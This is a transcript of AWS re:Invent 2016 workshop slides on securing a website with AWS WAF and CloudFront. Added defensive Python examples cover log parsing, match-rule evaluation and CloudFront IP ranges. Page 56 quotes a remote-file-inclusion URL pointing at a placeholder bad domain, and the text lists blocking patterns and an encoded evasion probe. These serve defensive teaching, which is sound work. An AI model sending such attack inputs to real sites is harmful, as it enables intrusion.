© 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved. Vlad Vlasceanu, Heitor Vital, Chris Colthurst November 29, 2016 Secure Your Web Application with AWS WAF and Amazon CloudFront SAC202 - Workshop

AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

Apr 16, 2017

Transcript
Page 1: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

© 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved.

Vlad Vlasceanu, Heitor Vital, Chris Colthurst

November 29, 2016

Secure Your Web Application with AWS WAF and Amazon CloudFront

SAC202 - Workshop

Page 2: The workshop team is here to help!

Chris Colthurst, Sean Greathouse, Assaf Namer, Heitor Vital, Vlad Vlasceanu, Christian Williams

Page 3: What to expect from the workshop

• Each table is expected to work as a team – find your table number
• Content is broken up into 3 chapters:
  • Introduction and baseline protection
  • Security automation
  • Advanced rules and additional security controls
• Team tasks:
  • Start with a baseline sample website (provided)
  • 3 tasks: implement the controls discussed in each chapter
• Handout:
  • Contains additional guidance for each task
• Find and implement the optimal solution!

Page 4: A story of courage, friendship … and WAF

Page 5: Prelude

Your friend Bob knows that you're great with computers and asks you to set up a website for him…

Page 6: Setup workshop environment

Follow the steps in the Prelude section of your handout to launch the AWS CloudFormation template:

1. Download the CloudFormation template from: https://s3-us-west-2.amazonaws.com/sac202-waf/sac202-cloudformation.json
2. Open the AWS Management Console for your account and go to CloudFormation. Select the Oregon, N. Virginia or Ireland AWS region in the top right corner.
3. Launch a CloudFormation stack using the downloaded template. Detailed steps are available in your handout document.

Checkpoint: What is AWS CloudFormation?

Page 7: Chapter 1: Baseline website and web application protection

Page 8: What is a web application firewall?

• A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to HTTP traffic
• WAFs come in four flavors:
  • Pure play: standalone appliance or software
  • CDN: bundled with a content delivery network
  • Load balancer: bundled with a load balancer
  • Universal threat manager (UTM): catch-all for misc. security

Page 9: Why use a WAF?

Application vulnerabilities:

[Diagram: good users and bad folks both reach your application (web server and database); the bad folks send exploit code at the application]

Page 10: Why use a WAF?

Abuse detection and prevention:

[Diagram: good users and bad folks both reach your application (web server and database); abuse by the bad folks results in data leaks]

Page 11: Why use a WAF?

Distributed denial of service (DDOS) attacks:

[Diagram: good users and bad folks both reach your application (web server and database); the bad folks flood it with requests]

Page 12: Why use a WAF?

AWS WAF blocks the bad folks and allows the good users:

[Diagram: AWS WAF sits in front of your application (web server and database); good users pass through, bad folks are blocked]

Page 13: Why use a WAF?

• WAFs help protect websites and applications against attacks that cause data breaches and downtime
• General WAF use cases:
  • Protect from SQL injection (SQLi) and cross-site scripting (XSS)
  • Prevent website scraping, crawlers, and bots
  • Mitigate DDOS (HTTP/HTTPS floods)
• Gartner reports that the main driver of WAF purchases (25-30%) is PCI compliance

Page 14: What about DDOS?

[Diagram: a spectrum from DDOS at one end to targeted attacks at the other, with the WAF's coverage marked in between. Labels, in order: Reflection and amplification; Layer 4 and 7 floods; Slowloris; SSL abuse; HTTP floods; SQL injection; Bots and probes; Application exploits; Social engineering; Reverse engineering]

Page 15: Attack vectors addressed by AWS WAF

• SQL injection: attackers insert malicious SQL code into web requests in an effort to extract data from your database
• Cross-site scripting (XSS): malicious scripts are injected into otherwise benign and trusted websites
• Scanners and probes: malicious sources scan and probe Internet-facing web applications for vulnerabilities
• Known attacker origins (IP reputation lists): a number of organizations maintain reputation lists of IP addresses of known attackers
• Bots and scrapers: some automated clients misrepresent themselves to bypass restrictions
• Application-level exploits

Page 16: Amazon CloudFront + AWS WAF

Amazon CloudFront:

• 68 points of presence around the world
• Improves performance by caching static content and optimizing connections for dynamic content
• Disperses traffic across global edge locations
• DDOS attacks (such as HTTP floods) are absorbed close to the source

Page 17: Introducing the AWS WAF

Page 18: Unique aspects of AWS WAF

• Customizable rules created by customers to avoid false positives
• Full-feature API: this is a DevOps WAF that can be deployed inline with new websites and applications
• Integrated with AWS: CloudFront, CloudWatch
• Integrated with partners: Alert Logic, TrendMicro, Imperva
• Pay-as-you-go pricing

Page 19: AWS WAF components

1. Conditions:
  • IP match
  • String match
  • SQL injection match
  • Cross-site scripting match
  • Size constraints
2. Rules: precedence / rule / action
3. Web access control lists (web ACL)
4. AWS resource: CloudFront distribution
5. Reporting: real-time metrics, sampled web requests

Page 20: AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

• Conditions are lists of criteria that

identify components of web requests

• Conditions include matching on the following:

• IP address i.e., /8, /16, /24, /32

• Strings, i.e., URI, query string, header, etc.

• SQL injection, i.e., looks for valid SQL statements

• Conditions are logically disjoined

• Conditions are reusable elements

• Filter targets and transformations

• Positional constraints (contains, exact,…)

AWS WAF: Conditions

Page 21: AWS WAF: Rules

• Rules are sets of conditions with a predetermined action
• Available actions are:
  • Block
  • Allow
  • Count
• Rules can logically join conditions
• Rules are reusable elements

Page 22: AWS WAF: Web ACL

• Web ACLs contain a set of conditions, rules, and actions
• Web ACLs are applied to one or many CloudFront distributions
• Web ACLs show you real-time metrics and sampled web requests for each rule
• Web ACLs evaluate rules in order
• Whitelisting or blacklisting behavior

Page 23: AWS WAF: Resource

Web ACLs are applied to CloudFront distributions:

• Rule reusability: use one web ACL for all distributions
• Flexibility: use an individual web ACL for each distribution

Page 24: AWS WAF: Reporting and logs

• Real-time metrics (CloudWatch):
  • Blocked web requests
  • Allowed web requests
  • Counted web requests
• Adjust rules in response to real-time metrics and sampled requests
• The time period can be adjusted by sliding the graph endpoints or via filters

Page 25: AWS WAF request process

Page 26: Example: Whitelisting good users

Verify that a valid referrer is present.

Raw request headers (from a good user):

Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; …
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive

Rule (string match condition), evaluated by AWS WAF in front of CloudFront:

Check: Header "Referer"
Match Type: Contains
Match: "example.com"
Action: ALLOW

Page 27: Example: Blacklisting bad bots

Block unwanted User-Agent headers and use transforms to stop evasion.

Raw request headers (from a scraper bot):

Host: www.example.com
User-Agent: bAdBoT
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.InTeRnEtkItTiEs.com/
Connection: keep-alive

Rule (string match condition), evaluated by AWS WAF in front of CloudFront:

Check: Header "User-Agent"
Transform: To lower
Match Type: Contains
Match: "badbot"
Action: BLOCK

Page 28: Bob runs for city council and is worried

Page 29: Task 1: Protect Bob's campaign website from threats

Page 30

Page 31: Chapter 2: AWS WAF security automation

Page 32: The story so far

✓ We have a website (or web application) operational
✓ Able to monitor it and analyze logs
✓ Able to filter basic common attack vectors

Page 33: Bob won the election and is busy improving the lives of his constituency

Page 34: The threat landscape is evolving

Dynamically reconfigure the WAF rules and conditions to better adapt to changing threats:

• React to changing sources of malicious traffic
• React to changing signatures of malicious requests
• Leverage reputation lists and keep them updated
• Predictive analysis

Page 35: Integration with DevOps: Analyzer

[Diagram: good users and bad folks reach the web server through AWS WAF; the WAF logs feed a threat analysis step, which drives a rule updater that reconfigures AWS WAF and sends a notification to the security engineer]

Page 36: Integration with DevOps: Scheduled

[Diagram: a scheduler periodically feeds a threat database into a rule updater, which reconfigures AWS WAF; good users and bad folks reach the web server through AWS WAF]

Page 37: Building blocks

[Diagram of the solution's building blocks, each service with its role:]
• Amazon S3: logs
• AWS Lambda: 1. analyzer, 2. rule updater
• Amazon CloudWatch: metrics & alarms
• AWS CloudFormation: pack solution
• Amazon API Gateway: HTTP/S endpoint
• AWS WAF: rule engine
• Amazon CloudFront: entry point
• Amazon Machine Learning: advanced analysis
• Amazon Kinesis: log streaming
• Amazon SNS: alerts

Page 38: Security automation examples

• HTTP floods
• Scanners and probes
• IP reputation lists
• Bots and scrapers

Page 39: Security automation examples

Page 40: Log parser: HTTP flood and scanner & probe protection

[Diagram: (a) Amazon CloudFront writes new access log files to an Amazon S3 bucket; (b) the new objects trigger the AWS Lambda log parser; (c) the log parser updates AWS WAF]

Page 41: Security automation examples

Page 42: IP reputation lists: known-attacker protection

[Diagram: (a) an hourly Amazon CloudWatch event triggers the AWS Lambda IP lists parser; (b) the parser fetches third-party IP reputation lists; (c) the parser updates AWS WAF in front of Amazon CloudFront]

Page 43: Security automation examples

Page 44: Bots and scrapers: bad bot and scraper protection

[Diagram: (a) the web application resources embed a honeypot link that a human visitor never sees; (b) a bot that follows it reaches Amazon CloudFront; (c) the AWS Lambda access handler records the source; (d) the handler updates AWS WAF]

The honeypot link as embedded in the page:

<a href="/v1/name/" style="display: none" aria-hidden="true">honeypot link</a>
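The log parser on page 40 and the honeypot access handler on page 44 both end in the same step, an UpdateIPSet call against AWS WAF. The Python below is an added example, not code from the workshop or from the AWS WAF Security Automations solution: it parses a constructed CloudFront access-log excerpt, picks out an HTTP flood source and a scanner/probe source with assumed thresholds, treats a hit on the slide's hidden /v1/name/ path as a bot, and turns the offending addresses into classic WAF IP set descriptors.

```python
"""Log-parser and honeypot access-handler logic feeding AWS WAF IP set updates."""
import ipaddress
from collections import Counter

# Constructed CloudFront access-log excerpt (tab-separated W3C format). Only the
# fields this parser needs are kept, in the order given on the #Fields line.
SAMPLE_LOG = """#Version: 1.0
#Fields: date time x-edge-location c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
2016-11-29\t10:00:01\tSEA19\t203.0.113.7\tGET\t/index.html\t200\tMozilla/5.0
2016-11-29\t10:00:03\tSEA19\t203.0.113.7\tGET\t/about.html\t200\tMozilla/5.0
2016-11-29\t10:00:01\tLHR50\t198.51.100.9\tGET\t/\t200\tpython-requests/2.9
2016-11-29\t10:00:01\tLHR50\t198.51.100.9\tGET\t/\t200\tpython-requests/2.9
2016-11-29\t10:00:02\tLHR50\t198.51.100.9\tGET\t/\t200\tpython-requests/2.9
2016-11-29\t10:00:02\tLHR50\t198.51.100.9\tGET\t/\t200\tpython-requests/2.9
2016-11-29\t10:00:02\tLHR50\t198.51.100.9\tGET\t/\t200\tpython-requests/2.9
2016-11-29\t10:00:05\tFRA2\t192.0.2.66\tGET\t/wp-admin/\t404\tcurl/7.47
2016-11-29\t10:00:06\tFRA2\t192.0.2.66\tGET\t/components/com_mojo/wp-comments-post.php\t404\tcurl/7.47
2016-11-29\t10:00:07\tFRA2\t192.0.2.66\tGET\t/old/\t403\tcurl/7.47
"""


def parse_cloudfront_log(text):
    """Yield one dict per log record, keyed by the names on the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def find_offenders(records, flood_threshold=4, error_threshold=3):
    """HTTP flood: more than flood_threshold requests from one IP in the file.
    Scanner/probe: at least error_threshold 4xx responses to one IP, i.e. a client
    that keeps asking for paths that do not exist or are forbidden. Thresholds are assumed."""
    requests, errors = Counter(), Counter()
    for rec in records:
        requests[rec["c-ip"]] += 1
        if rec["sc-status"].startswith("4"):
            errors[rec["c-ip"]] += 1
    floods = {ip for ip, n in requests.items() if n > flood_threshold}
    probes = {ip for ip, n in errors.items() if n >= error_threshold}
    return floods, probes


# The hidden link from the slide; a human never sees it, so following it marks a bot.
HONEYPOT_PATH = "/v1/name/"


def honeypot_hit(path, source_ip):
    """Access handler: return the source IP to block if the request is for the honeypot."""
    return source_ip if path.startswith(HONEYPOT_PATH) else None


def ipset_updates(ips, action="INSERT"):
    """Build classic AWS WAF UpdateIPSet descriptors. IP sets take single hosts as
    /32 (IPv4) or /128 (IPv6), so the prefix length follows the address family."""
    updates = []
    for ip in sorted(ips):
        addr = ipaddress.ip_address(ip)
        updates.append({"Action": action, "IPSetDescriptor": {
            "Type": f"IPV{addr.version}", "Value": f"{addr}/{addr.max_prefixlen}"}})
    return updates


def block_list_from_log(text):
    """Glue for the log-parser Lambda: parse, pick offenders, emit the WAF update."""
    floods, probes = find_offenders(parse_cloudfront_log(text))
    return ipset_updates(floods | probes)
```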

Page 45: Bob runs for state senate and is very worried

Page 46: Task 2: Protect Bob's campaign website from changing threats

Page 47: Hands-On: HTTP/S protection

[Diagram: AWS WAF between good users / bad folks and the site; caption: Runs for state senate]

Page 48

Page 49: Chapter 3: Additional security controls

Page 50: The story so far

✓ We have a website (or web application) operational
✓ Able to monitor it and analyze logs
✓ Able to filter basic common attack vectors
✓ Able to automate and react to dynamic security conditions

Page 51: Bob won the election and is busy improving the lives of his constituency

Page 52: Where do we go from here?

What can we do to further improve security?

✓ Restrict content to the geography of our audience
✓ Secure our specific application profile
✓ Prevent CDN bypass
✓ Comprehensive look at web app security – OWASP Top 10

Page 53: OWASP top 10 (2013)

Represents a broad consensus about what the most critical web application security flaws are:

A1 Injection
A2 Broken authentication and session management
A3 Cross-site scripting (XSS)
A4 Insecure direct object references
A5 Security misconfiguration
A6 Sensitive data exposure
A7 Missing function level access control
A8 Cross-site request forgery (CSRF)
A9 Using components with known vulnerabilities
A10 Unvalidated redirects and forwards

Page 54: OWASP top 10 (2013)

Not all OWASP top 10 flaws can be addressed with a WAF. Security flaws that AWS WAF can help mitigate to varying degrees are marked with ✓ on the slide:

A1 Injection (e.g. SQL injection)
A2 Broken authentication and session management
A3 Cross-site scripting (XSS)
A4 Insecure direct object references
A5 Security misconfiguration
A6 Sensitive data exposure
A7 Missing function level access control
A8 Cross-site request forgery (CSRF)
A9 Using components with known vulnerabilities
A10 Unvalidated redirects and forwards

✓ ✓

Page 55: Securing our specific application profile

1. Know your application in depth, even if it's an open source/commercial off-the-shelf product. What services/URL paths does it expose to the web?
2. Know the packages, libraries, and components your application is leveraging. What additional features and services do they expose?
3. Keep them all up to date, and install security patches promptly. Keep the exposure footprint low.

Page 56: Limit access to nonpublic features

Does your website/application have a control/admin interface?
• Whitelist access to only known IP sources

At risk from a vulnerable platform runtime/middleware?
• Block suspect requests by string matching

Does your app or runtime include web-accessible server-side components?
• Block access to such component URLs via string matching

Examples:

Wordpress Admin: http://<my_domain>/wp-admin/
http://<my_domain>/?_SERVER[DOCUMENT_ROOT]=http://<bad_domain>/bad.txt?
http://<your_joomla_cms>/components/com_mojo/wp-comments-post.php

Page 57: Example: Using string match sets

{
  "ByteMatchSet": {
    "ByteMatchSetId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
    "Name": "my-string-filters",
    "ByteMatchTuples": [
      {
        "TargetString": "/wp-admin",
        "PositionalConstraint": "STARTS_WITH",
        "TextTransformation": "URL_DECODE",
        "FieldToMatch": { "Type": "URI" }
      }
    ]
  }
}
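The referrer whitelist on page 26, the User-Agent blacklist with its to-lower transform on page 27, and the ByteMatchSet above all share one evaluation model: transform the inspected field, apply the positional constraint, and let the web ACL take the first ALLOW or BLOCK in rule order. The Python below is an added example, not the workshop's or the AWS WAF service's code; the three conditions, the rule priorities and the sample requests are constructed for illustration.

```python
"""Evaluate classic AWS WAF string match conditions and an ordered web ACL."""
from urllib.parse import unquote

# Text transformations modelled here (assumption: the three used on the slides).
TRANSFORMS = {"NONE": lambda s: s, "LOWERCASE": str.lower, "URL_DECODE": unquote}


def field_value(request, field):
    """Return the part of the request a tuple inspects: URI, QUERY_STRING or one HEADER."""
    kind = field["Type"]
    if kind == "URI":
        return request["uri"]
    if kind == "QUERY_STRING":
        return request.get("query", "")
    if kind == "HEADER":  # header names are case-insensitive, normalise before lookup
        headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
        return headers.get(field["Data"].lower(), "")
    raise ValueError(f"unsupported FieldToMatch type {kind}")


def tuple_matches(request, tup):
    """One ByteMatchTuple: transform the field first, then apply the positional constraint."""
    value = TRANSFORMS[tup["TextTransformation"]](field_value(request, tup["FieldToMatch"]))
    target, constraint = tup["TargetString"], tup["PositionalConstraint"]
    checks = {"CONTAINS": lambda: target in value,
              "STARTS_WITH": lambda: value.startswith(target),
              "ENDS_WITH": lambda: value.endswith(target),
              "EXACTLY": lambda: value == target}
    return checks[constraint]()


def condition_matches(request, byte_match_set):
    """Filters inside one condition are disjoined: any tuple matching makes it match."""
    return any(tuple_matches(request, t) for t in byte_match_set["ByteMatchTuples"])


def evaluate_web_acl(request, rules, default_action):
    """Rules run in precedence order; the first ALLOW/BLOCK hit decides. COUNT only records."""
    counted = []
    for rule in sorted(rules, key=lambda r: r["Priority"]):
        if all(condition_matches(request, c) for c in rule["Conditions"]):
            if rule["Action"] == "COUNT":
                counted.append(rule["Name"])
                continue
            return rule["Action"], counted
    return default_action, counted


# Constructed conditions mirroring the slides: referrer whitelist, bad-bot blacklist,
# and the /wp-admin string match set. The HTTP header is spelled "Referer".
REFERER_OK = {"ByteMatchTuples": [{"TargetString": "example.com", "PositionalConstraint": "CONTAINS",
              "TextTransformation": "NONE", "FieldToMatch": {"Type": "HEADER", "Data": "Referer"}}]}
BAD_BOT = {"ByteMatchTuples": [{"TargetString": "badbot", "PositionalConstraint": "CONTAINS",
           "TextTransformation": "LOWERCASE", "FieldToMatch": {"Type": "HEADER", "Data": "User-Agent"}}]}
WP_ADMIN = {"ByteMatchTuples": [{"TargetString": "/wp-admin", "PositionalConstraint": "STARTS_WITH",
            "TextTransformation": "URL_DECODE", "FieldToMatch": {"Type": "URI"}}]}
RULES = [
    {"Name": "block-bad-bots", "Priority": 1, "Action": "BLOCK", "Conditions": [BAD_BOT]},
    {"Name": "block-wp-admin", "Priority": 2, "Action": "BLOCK", "Conditions": [WP_ADMIN]},
    {"Name": "allow-good-referer", "Priority": 3, "Action": "ALLOW", "Conditions": [REFERER_OK]},
]

# Constructed requests: a browser with a valid referrer, the slide's scraper, and a probe
# that percent-encodes the dash in /wp-admin to slip past a match done without URL_DECODE.
GOOD = {"uri": "/index.html", "headers": {"User-Agent": "Mozilla/5.0", "Referer": "http://www.example.com/"}}
SCRAPER = {"uri": "/index.html", "headers": {"User-Agent": "bAdBoT", "Referer": "http://www.InTeRnEtkItTiEs.com/"}}
ADMIN_PROBE = {"uri": "/wp%2Dadmin/", "headers": {"User-Agent": "curl/7.47"}}


def decide(request):
    """Whitelisting web ACL: anything no rule allows is blocked by the default action."""
    return evaluate_web_acl(request, RULES, default_action="BLOCK")[0]
```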

Page 58: CloudFront geo restrictions

Geo restrictions or geoblocking: prevent users in specific geographic locations from accessing content.

• Amazon CloudFront supports geo restrictions at the country level
• Whitelisting or blacklisting approach
• Most commonly used to limit access to content to locations where a distribution right exists
• Security perspective: limit the exposure footprint and potentially increase the cost of launching attacks against your website

Page 59: CloudFront geo restrictions in depth

• CloudFront distribution-level restrictions
• CloudFront uses a third-party GeoIP database
• 99.8% accurate source IP geolocation
• Based on the distribution's restrictions, the edge location decides to allow or block
• Blocked requests return a 403 (Forbidden) status code

Page 60: Prevent CDN bypassing

Deploying WAF filtering at the edge is effective … as long as bad folks can't bypass your CloudFront distribution.

• Configure origins to only accept traffic from the CloudFront edge locations
• Set up S3 origins to use an origin access identity (OAI) and configure S3 bucket policies to accept GetObject API calls from the OAI principal
• Configure firewall rules on custom origins to accept traffic only from CloudFront IP ranges

Page 61: Getting the AWS IP ranges

AWS publishes its current IP address ranges in JSON format at https://ip-ranges.amazonaws.com/ip-ranges.json:

• Both IPv4 and IPv6 ranges are published
• Filter the service attribute by the CLOUDFRONT value
• Track changes in the list via the createDate attribute
• Subscribe to the following Amazon SNS topic to receive notifications when AWS IP address ranges change:

Topic ARN: arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged

Page 62: Automatic VPC security group updates

Blog post: How to Automatically Update Your Security Groups for Amazon CloudFront and AWS WAF by Using AWS Lambda
http://amzn.to/2fj4Q8e

1. Create a VPC security group; use tagging to designate that it can be auto-updated
2. Create an IAM policy and AWS Lambda execution role; grant the function permission to change the security group
3. Create the AWS Lambda function using the provided code and execution role
4. Create the function trigger using the Amazon SNS AmazonIpSpaceChanged topic
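To tie pages 60 to 62 together, the Python below is an added example, not the blog post's Lambda function or any AWS code: it filters a constructed ip-ranges.json excerpt by the CLOUDFRONT service value, uses createDate to skip runs where nothing changed, computes the ingress CIDRs a security group must add and revoke, and builds the S3 bucket policy that lets only an origin access identity read objects. The OAI ID, bucket name and security-group contents are placeholders.

```python
"""Filter ip-ranges.json for CloudFront and diff it against an origin's security group."""
import ipaddress
import json

# Constructed excerpt in the shape of https://ip-ranges.amazonaws.com/ip-ranges.json;
# the prefixes are documentation ranges, not real AWS allocations.
SAMPLE_IP_RANGES = json.dumps({
    "syncToken": "1480377600",
    "createDate": "2016-11-29-00-00-00",
    "prefixes": [
        {"ip_prefix": "198.51.100.0/24", "region": "GLOBAL", "service": "CLOUDFRONT"},
        {"ip_prefix": "203.0.113.0/24", "region": "GLOBAL", "service": "CLOUDFRONT"},
        {"ip_prefix": "192.0.2.0/24", "region": "us-east-1", "service": "AMAZON"},
    ],
    "ipv6_prefixes": [
        {"ipv6_prefix": "2001:db8::/32", "region": "GLOBAL", "service": "CLOUDFRONT"},
    ],
})


def cloudfront_ranges(document):
    """Return (createDate, IPv4 set, IPv6 set) for prefixes whose service is CLOUDFRONT."""
    data = json.loads(document)
    v4 = {p["ip_prefix"] for p in data["prefixes"] if p["service"] == "CLOUDFRONT"}
    v6 = {p["ipv6_prefix"] for p in data["ipv6_prefixes"] if p["service"] == "CLOUDFRONT"}
    for cidr in v4 | v6:
        ipaddress.ip_network(cidr)  # refuse to build firewall rules from a malformed entry
    return data["createDate"], v4, v6


def security_group_diff(current_cidrs, wanted_cidrs):
    """Ingress CIDRs to add and to revoke so the group allows exactly the CloudFront ranges."""
    current, wanted = set(current_cidrs), set(wanted_cidrs)
    return sorted(wanted - current), sorted(current - wanted)


def plan_update(document, last_seen_create_date, current_cidrs):
    """What the SNS-triggered function would do: skip an unchanged list, else compute the diff."""
    create_date, v4, v6 = cloudfront_ranges(document)
    if create_date == last_seen_create_date:
        return {"changed": False, "add": [], "revoke": []}
    add, revoke = security_group_diff(current_cidrs, v4 | v6)
    return {"changed": True, "createDate": create_date, "add": add, "revoke": revoke}


def origin_bucket_policy(bucket, oai_id):
    """S3 bucket policy granting GetObject only to the CloudFront origin access identity.
    oai_id is the OAI's ID (placeholder); the principal ARN form is the one S3 uses for OAIs."""
    return {"Version": "2012-10-17", "Statement": [{
        "Sid": "AllowCloudFrontOAIRead",
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::cloudfront:user/CloudFront Origin Access Identity {oai_id}"},
        "Action": "s3:GetObject",
        "Resource": f"arn:aws:s3:::{bucket}/*"}]}
```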

Page 63: Bob runs for congress and is extremely worried

Page 64: Task 3: Add additional security controls to Bob's campaign website

Page 65

Page 66: Thank you!

Page 67: Useful resources

AWS WAF Security Automations
https://aws.amazon.com/answers/security/aws-waf-security-automations/

AWS Best Practices for DDOS Resiliency
https://d0.awsstatic.com/whitepapers/Security/DDoS_White_Paper.pdf

Page 68: Remember to complete your evaluations!

Page 69: Related sessions

CTD204 – Offload Security Heavy-lifting to the AWS Edge – Nihar Bihani, Sr. Manager, AWS Product Management
SAC304 – Predictive Security: Using Big Data to Fortify Your Defenses – Michael Capicotto and Matt Nowina, AWS Solutions Architects
SAC316 – Security Automation: Spend Less Time Securing Your Applications – Venkat Vijayaraghavan, AWS Sr. Product Manager; Nathan Dye, AWS Software Development Manager